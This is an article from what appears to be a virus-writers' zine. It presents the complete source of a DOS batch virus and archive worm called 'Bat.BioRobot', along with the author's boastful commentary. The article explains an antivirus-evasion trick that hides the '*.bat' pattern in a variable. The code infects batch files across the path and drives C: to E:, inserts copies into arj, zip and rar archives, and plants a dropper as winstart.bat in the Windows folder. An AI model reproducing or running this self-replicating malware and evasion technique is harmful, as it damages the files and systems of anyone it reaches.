The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - Bat.BioRobot by NeKr0
Dont kick me! Its my ooold virus, when i was interested in batch :)
Its a pretty simple virus/archive-worm (he was written in old dos times and
useed for worming archvators from path). And it uses one antiheuristic trick.
Bastard AV scream if they see a string like "for %%a in (*.bat) do ..." .
But if you set variable=bat or *.bat and write "for %%a in (*.%variable%)" AV just shuts up :) .
Work: Trying to add dropper in arj, rar & zip archives.
Infects bat files in path, current dir, updir and c: d: e: disks
Adds dropper in %windir% folder as winstart.bat
========= There is Bat.BioRobot
@ctty nul%BR1%
if '%1'=='BR1DiR' goto BR1diRz
if '%1'=='BR1' goto BR1zex
set BR1FK=bat
echo.>BR1.bat
Find "BR1"<%0>>BR1.bat
for %%a in (*.arj ..\*.arj) do arj a %%a BR1.bat
for %%a in (*.zip ..\*.zip) do pkzip %%a BR1.bat
for %%a in (*.rar ..\*.rar) do rar a %%a BR1.bat
for %%r in (%path% . .. c: d: e:) do call BR1.bat BR1DiR %%r
goto BR1pre
:BR1DiRz
for %%c in (%2\*.%BR1FK%) do if not %%c==%2\AUTOEXEC.BAT call BR1.bat BR1 %%c
goto BR1end
:BR1pre
type BR1.bat >%windir%\winstart.bat
del BR1.bat
goto BR1end
:BR1zex
Find "BR1"<%2>nul
if errorlevel 1 type BR1.bat>>%2
:BR1end [StRANGER.Bi0R0b0t NeKr0!]
================ There is no Bat.BioRobot :p
P.S.: You may not use batch, but you MUST know batch :p